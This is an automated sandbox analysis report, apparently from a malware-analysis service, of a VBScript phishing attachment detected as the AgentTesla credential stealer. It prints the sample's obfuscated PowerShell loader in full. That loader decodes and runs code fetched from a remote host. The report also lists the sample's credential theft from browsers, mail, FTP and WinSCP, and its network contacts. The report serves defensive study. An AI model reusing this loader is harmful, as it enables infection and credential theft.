.ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.Beli Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Electronegative.Sha && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$semiannually163 = 1;$varityped='substrin';$varityped+='g';function spatiumet($merotomy){$ganglioma=$merotomy.length-$semiannually163;for($undereying136=5; $undereying136 -lt $ganglioma; $undereying136+=(6)){$stacc+=$merotomy.$varityped.invoke($undereying136, $semiannually163);}$stacc;}function salsdren($fortynd){. ($fusionsaftaler) ($fortynd);}$morallovene=spatiumet 'findem slabobed,mzguiltisu.nolunforlvarmeaskru /afslr5 p yn.u aft0 kost al,og(ddsaaw,pitaiboo lnbrssednusseosem cwfremssdi eg chattnpretht,oren supra1abe.s0guldv.colou0haema;adria br,dswr creiformanrefrn6uncou4velar; legi noncix non 6 nikl4synli; skri pseurgasm,vp,gts:bj.rg1 mo,i2organ1armad.flask0abs,i)galo. r tscgskyldeaktioc dionknoncoosyske/,atin2luged0janse1bul.p0fj.rn0e cin1pante0coope1surro ,aineffly eiuvi lr,readerve,efdiphyoaphroxharri/bygn.1eluls2ebelt1tra i.perca0 dupe ';$anathematise=spatiumet 'lill,ufalhos spleep lorrfiske-ohsknan.ighg pawne masknlechrtonion ';$aivr=spatiumet 'figurhpreintger.rtvognppt.llas.onse:lay u/bi,le/ b.lldfinerrf.agti bj,gvindpae.atte. .ilpgcanchoeuropo educgwr telafslaered.m.bak uck upvopengem vlve/afstvupervecfrit ? k,noelivewxminerp belootiltrrwind tu lia=ballodsankeoop ftwkrverndekodlkapreo oxydahum.ld appl& scarigeomedamnio= hudd1 dommol.omes erroqgal,iaudbetzkartolchanikratapr tink_ clar7 kna.hf.uevzspadsprovdy0deminlatomasph.lif pagibprogr9 aergdtappejudb t3fanmagfagblxdagplcn,nineoutf.ouna.etcentr-sikke9figensbrain5tyven ';$succesombrust=spatiumet 'trykl>polyh ';$fusionsaftaler=spatiumet 'af enitankeewattsxal um ';$pantebrevshandelen = spatiumet ' ntee jerncwkdreha johol,xia d.ske%svindara,tapdevonpbuti,dci,araoveretpennaadef,n%pragt\flec.efu,dvlsubapeprovicsortetindicr theooeb.lln trouesup lg panda .ogltreinsidriftv hypee beci. at es u.dihung oaper,i patte&union& s.bl hamm eosterc konghun.pao urba lsnin$pum.c ';salsdren (spatiumet 'suppl$enh.lgbolivlsemino uni,bboligasvulmlindsp: plo,ftransl tje,uringlkgroovtra eru jungecatenr hovnigreennundefgoutre=himme(tiltac epokmxsford ra.i prova/datasc deut dext.$ mesipjagteaboligngelogt skilebehanbeupherenra.el gtevcrustsisba.h dewaahalopnchrisdskakte railludadredec,lnpaatv)antil ');salsdren (spatiumet ' mist$ ma,sgtilprl banko dashb.annyakardslquant:geledacemennmaalet bet.h,iltvr .ndkoabamppa taco pa lppass hpa ahatr,llgubereiagerbsgrns tforsii .airc e,ip=garvn$fratraseraliarapavfenacrottea.journsmorbrpintarlmandaicou ttsuper(skri $st nosamp,iu nytaccontrcrygraepunktsrecomo navnmkhedabexsicrdameturustbsunddrtbesgs)t les ');$aivr=$anthropophagistic[0];salsdren (spatiumet 'ov rm$ciphegopskrlpromeof rskbscollaantiplf.ske:b skufdrvleoafbrer ulkss .ragefl esnausredligniedishblinsisstel.fe undesdagceosnapsmtilvekydelsoshattsb odstautoenmicreigalannmindeg sladedopinrfyrin= itrinfa,ceecellewphono- sknlohoussbplotnj deple hydrcun.stt refr konkusbucrny.ecoms affttno glesens msa kt.beli
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$semiannually163 = 1;$varityped='substrin';$varityped+='g';function spatiumet($merotomy){$ganglioma=$merotomy.length-$semiannually163;for($undereying136=5; $undereying136 -lt $ganglioma; $undereying136+=(6)){$stacc+=$merotomy.$varityped.invoke($undereying136, $semiannually163);}$stacc;}function salsdren($fortynd){. ($fusionsaftaler) ($fortynd);}$morallovene=spatiumet 'findem slabobed,mzguiltisu.nolunforlvarmeaskru /afslr5 p yn.u aft0 kost al,og(ddsaaw,pitaiboo lnbrssednusseosem cwfremssdi eg chattnpretht,oren supra1abe.s0guldv.colou0haema;adria br,dswr creiformanrefrn6uncou4velar; legi noncix non 6 nikl4synli; skri pseurgasm,vp,gts:bj.rg1 mo,i2organ1armad.flask0abs,i)galo. r tscgskyldeaktioc dionknoncoosyske/,atin2luged0janse1bul.p0fj.rn0e cin1pante0coope1surro ,aineffly eiuvi lr,readerve,efdiphyoaphroxharri/bygn.1eluls2ebelt1tra i.perca0 dupe ';$anathematise=spatiumet 'lill,ufalhos spleep lorrfiske-ohsknan.ighg pawne masknlechrtonion ';$aivr=spatiumet 'figurhpreintger.rtvognppt.llas.onse:lay u/bi,le/ b.lldfinerrf.agti bj,gvindpae.atte. .ilpgcanchoeuropo educgwr telafslaered.m.bak uck upvopengem vlve/afstvupervecfrit ? k,noelivewxminerp belootiltrrwind tu lia=ballodsankeoop ftwkrverndekodlkapreo oxydahum.ld appl& scarigeomedamnio= hudd1 dommol.omes erroqgal,iaudbetzkartolchanikratapr tink_ clar7 kna.hf.uevzspadsprovdy0deminlatomasph.lif pagibprogr9 aergdtappejudb t3fanmagfagblxdagplcn,nineoutf.ouna.etcentr-sikke9figensbrain5tyven ';$succesombrust=spatiumet 'trykl>polyh ';$fusionsaftaler=spatiumet 'af enitankeewattsxal um ';$pantebrevshandelen = spatiumet ' ntee jerncwkdreha johol,xia d.ske%svindara,tapdevonpbuti,dci,araoveretpennaadef,n%pragt\flec.efu,dvlsubapeprovicsortetindicr theooeb.lln trouesup lg panda .ogltreinsidriftv hypee beci. at es u.dihung oaper,i patte&union& s.bl hamm eosterc konghun.pao urba lsnin$pum.c ';salsdren (spatiumet 'suppl$enh.lgbolivlsemino uni,bboligasvulmlindsp: plo,ftransl tje,uringlkgroovtra eru jungecatenr hovnigreennundefgoutre=himme(tiltac epokmxsford ra.i prova/datasc deut dext.$ mesipjagteaboligngelogt skilebehanbeupherenra.el gtevcrustsisba.h dewaahalopnchrisdskakte railludadredec,lnpaatv)antil ');salsdren (spatiumet ' mist$ ma,sgtilprl banko dashb.annyakardslquant:geledacemennmaalet bet.h,iltvr .ndkoabamppa taco pa lppass hpa ahatr,llgubereiagerbsgrns tforsii .airc e,ip=garvn$fratraseraliarapavfenacrottea.journsmorbrpintarlmandaicou ttsuper(skri $st nosamp,iu nytaccontrcrygraepunktsrecomo navnmkhedabexsicrdameturustbsunddrtbesgs)t les ');$aivr=$anthropophagistic[0];salsdren (spatiumet 'ov rm$ciphegopskrlpromeof rskbscollaantiplf.ske:b skufdrvleoafbrer ulkss .ragefl esnausredligniedishblinsisstel.fe undesdagceosnapsmtilvekydelsoshattsb odstautoenmicreigalannmindeg sladedopinrfyrin= itrinfa,ceecellewphono- sknlohoussbplotnj deple hydrcun.stt refr konkusbucrny.ecoms affttno glesens msa kt.beli
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$semiannually163 = 1;$varityped='substrin';$varityped+='g';function spatiumet($merotomy){$ganglioma=$merotomy.length-$semiannually163;for($undereying136=5; $undereying136 -lt $ganglioma; $undereying136+=(6)){$stacc+=$merotomy.$varityped.invoke($undereying136, $semiannually163);}$stacc;}function salsdren($fortynd){. ($fusionsaftaler) ($fortynd);}$morallovene=spatiumet 'findem slabobed,mzguiltisu.nolunforlvarmeaskru /afslr5 p yn.u aft0 kost al,og(ddsaaw,pitaiboo lnbrssednusseosem cwfremssdi eg chattnpretht,oren supra1abe.s0guldv.colou0haema;adria br,dswr creiformanrefrn6uncou4velar; legi noncix non 6 nikl4synli; skri pseurgasm,vp,gts:bj.rg1 mo,i2organ1armad.flask0abs,i)galo. r tscgskyldeaktioc dionknoncoosyske/,atin2luged0janse1bul.p0fj.rn0e cin1pante0coope1surro ,aineffly eiuvi lr,readerve,efdiphyoaphroxharri/bygn.1eluls2ebelt1tra i.perca0 dupe ';$anathematise=spatiumet 'lill,ufalhos spleep lorrfiske-ohsknan.ighg pawne masknlechrtonion ';$aivr=spatiumet 'figurhpreintger.rtvognppt.llas.onse:lay u/bi,le/ b.lldfinerrf.agti bj,gvindpae.atte. .ilpgcanchoeuropo educgwr telafslaered.m.bak uck upvopengem vlve/afstvupervecfrit ? k,noelivewxminerp belootiltrrwind tu lia=ballodsankeoop ftwkrverndekodlkapreo oxydahum.ld appl& scarigeomedamnio= hudd1 dommol.omes erroqgal,iaudbetzkartolchanikratapr tink_ clar7 kna.hf.uevzspadsprovdy0deminlatomasph.lif pagibprogr9 aergdtappejudb t3fanmagfagblxdagplcn,nineoutf.ouna.etcentr-sikke9figensbrain5tyven ';$succesombrust=spatiumet 'trykl>polyh ';$fusionsaftaler=spatiumet 'af enitankeewattsxal um ';$pantebrevshandelen = spatiumet ' ntee jerncwkdreha johol,xia d.ske%svindara,tapdevonpbuti,dci,araoveretpennaadef,n%pragt\flec.efu,dvlsubapeprovicsortetindicr theooeb.lln trouesup lg panda .ogltreinsidriftv hypee beci. at es u.dihung oaper,i patte&union& s.bl hamm eosterc konghun.pao urba lsnin$pum.c ';salsdren (spatiumet 'suppl$enh.lgbolivlsemino uni,bboligasvulmlindsp: plo,ftransl tje,uringlkgroovtra eru jungecatenr hovnigreennundefgoutre=himme(tiltac epokmxsford ra.i prova/datasc deut dext.$ mesipjagteaboligngelogt skilebehanbeupherenra.el gtevcrustsisba.h dewaahalopnchrisdskakte railludadredec,lnpaatv)antil ');salsdren (spatiumet ' mist$ ma,sgtilprl banko dashb.annyakardslquant:geledacemennmaalet bet.h,iltvr .ndkoabamppa taco pa lppass hpa ahatr,llgubereiagerbsgrns tforsii .airc e,ip=garvn$fratraseraliarapavfenacrottea.journsmorbrpintarlmandaicou ttsuper(skri $st nosamp,iu nytaccontrcrygraepunktsrecomo navnmkhedabexsicrdameturustbsunddrtbesgs)t les ');$aivr=$anthropophagistic[0];salsdren (spatiumet 'ov rm$ciphegopskrlpromeof rskbscollaantiplf.ske:b skufdrvleoafbrer ulkss .ragefl esnausredligniedishblinsisstel.fe undesdagceosnapsmtilvekydelsoshattsb odstautoenmicreigalannmindeg sladedopinrfyrin= itrinfa,ceecellewphono- sknlohoussbplotnj deple hydrcun.stt refr konkusbucrny.ecoms affttno glesens msa kt.beli Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$semiannually163 = 1;$varityped='substrin';$varityped+='g';function spatiumet($merotomy){$ganglioma=$merotomy.length-$semiannually163;for($undereying136=5; $undereying136 -lt $ganglioma; $undereying136+=(6)){$stacc+=$merotomy.$varityped.invoke($undereying136, $semiannually163);}$stacc;}function salsdren($fortynd){. ($fusionsaftaler) ($fortynd);}$morallovene=spatiumet 'findem slabobed,mzguiltisu.nolunforlvarmeaskru /afslr5 p yn.u aft0 kost al,og(ddsaaw,pitaiboo lnbrssednusseosem cwfremssdi eg chattnpretht,oren supra1abe.s0guldv.colou0haema;adria br,dswr creiformanrefrn6uncou4velar; legi noncix non 6 nikl4synli; skri pseurgasm,vp,gts:bj.rg1 mo,i2organ1armad.flask0abs,i)galo. r tscgskyldeaktioc dionknoncoosyske/,atin2luged0janse1bul.p0fj.rn0e cin1pante0coope1surro ,aineffly eiuvi lr,readerve,efdiphyoaphroxharri/bygn.1eluls2ebelt1tra i.perca0 dupe ';$anathematise=spatiumet 'lill,ufalhos spleep lorrfiske-ohsknan.ighg pawne masknlechrtonion ';$aivr=spatiumet 'figurhpreintger.rtvognppt.llas.onse:lay u/bi,le/ b.lldfinerrf.agti bj,gvindpae.atte. .ilpgcanchoeuropo educgwr telafslaered.m.bak uck upvopengem vlve/afstvupervecfrit ? k,noelivewxminerp belootiltrrwind tu lia=ballodsankeoop ftwkrverndekodlkapreo oxydahum.ld appl& scarigeomedamnio= hudd1 dommol.omes erroqgal,iaudbetzkartolchanikratapr tink_ clar7 kna.hf.uevzspadsprovdy0deminlatomasph.lif pagibprogr9 aergdtappejudb t3fanmagfagblxdagplcn,nineoutf.ouna.etcentr-sikke9figensbrain5tyven ';$succesombrust=spatiumet 'trykl>polyh ';$fusionsaftaler=spatiumet 'af enitankeewattsxal um ';$pantebrevshandelen = spatiumet ' ntee jerncwkdreha johol,xia d.ske%svindara,tapdevonpbuti,dci,araoveretpennaadef,n%pragt\flec.efu,dvlsubapeprovicsortetindicr theooeb.lln trouesup lg panda .ogltreinsidriftv hypee beci. at es u.dihung oaper,i patte&union& s.bl hamm eosterc konghun.pao urba lsnin$pum.c ';salsdren (spatiumet 'suppl$enh.lgbolivlsemino uni,bboligasvulmlindsp: plo,ftransl tje,uringlkgroovtra eru jungecatenr hovnigreennundefgoutre=himme(tiltac epokmxsford ra.i prova/datasc deut dext.$ mesipjagteaboligngelogt skilebehanbeupherenra.el gtevcrustsisba.h dewaahalopnchrisdskakte railludadredec,lnpaatv)antil ');salsdren (spatiumet ' mist$ ma,sgtilprl banko dashb.annyakardslquant:geledacemennmaalet bet.h,iltvr .ndkoabamppa taco pa lppass hpa ahatr,llgubereiagerbsgrns tforsii .airc e,ip=garvn$fratraseraliarapavfenacrottea.journsmorbrpintarlmandaicou ttsuper(skri $st nosamp,iu nytaccontrcrygraepunktsrecomo navnmkhedabexsicrdameturustbsunddrtbesgs)t les ');$aivr=$anthropophagistic[0];salsdren (spatiumet 'ov rm$ciphegopskrlpromeof rskbscollaantiplf.ske:b skufdrvleoafbrer ulkss .ragefl esnausredligniedishblinsisstel.fe undesdagceosnapsmtilvekydelsoshattsb odstautoenmicreigalannmindeg sladedopinrfyrin= itrinfa,ceecellewphono- sknlohoussbplotnj deple hydrcun.stt refr konkusbucrny.ecoms affttno glesens msa kt.beli Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 0000000B.00000002.2782121824.0000000022FEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2782121824.0000000022FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\FTP Navigator\Ftplist.txt Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 0000000B.00000002.2782121824.0000000022FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 0000000B.00000002.2782121824.0000000022FEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2782121824.0000000022FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428354 Sample: Shipping Dcuments_CI PKL_HL_.vbs Startdate: 18/04/2024 Architecture: WINDOWS Score: 100 31 mail.myhydropowered.com 2->31 33 ip-api.com 2->33 35 4 other IPs or domains 2->35 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Antivirus detection for URL or domain 2->53 55 7 other signatures 2->55 9 wscript.exe 1 2->9         started        signatures3 process4 signatures5 57 VBScript performs obfuscated calls to suspicious functions 9->57 59 Suspicious powershell command line found 9->59 61 Wscript starts Powershell (via cmd or directly) 9->61 63 3 other signatures 9->63 12 powershell.exe 14 19 9->12         started        16 WmiPrvSE.exe 9->16         started        process6 dnsIp7 41 drive.google.com 64.233.185.102, 443, 49705, 49714 GOOGLEUS United States 12->41 43 drive.usercontent.google.com 64.233.185.132, 443, 49707, 49716 GOOGLEUS United States 12->43 73 Suspicious powershell command line found 12->73 75 Very long command line found 12->75 77 Found suspicious powershell code related to unpacking or dynamic code loading 12->77 18 powershell.exe 17 12->18         started        21 conhost.exe 12->21         started        23 cmd.exe 1 12->23         started        signatures8 process9 signatures10 45 Writes to foreign memory regions 18->45 47 Found suspicious powershell code related to unpacking or dynamic code loading 18->47 25 wab.exe 15 8 18->25         started        29 cmd.exe 1 18->29         started        process11 dnsIp12 37 ip-api.com 208.95.112.1, 49718, 80 TUT-ASUS United States 25->37 39 api.ipify.org 172.67.74.152, 443, 49717 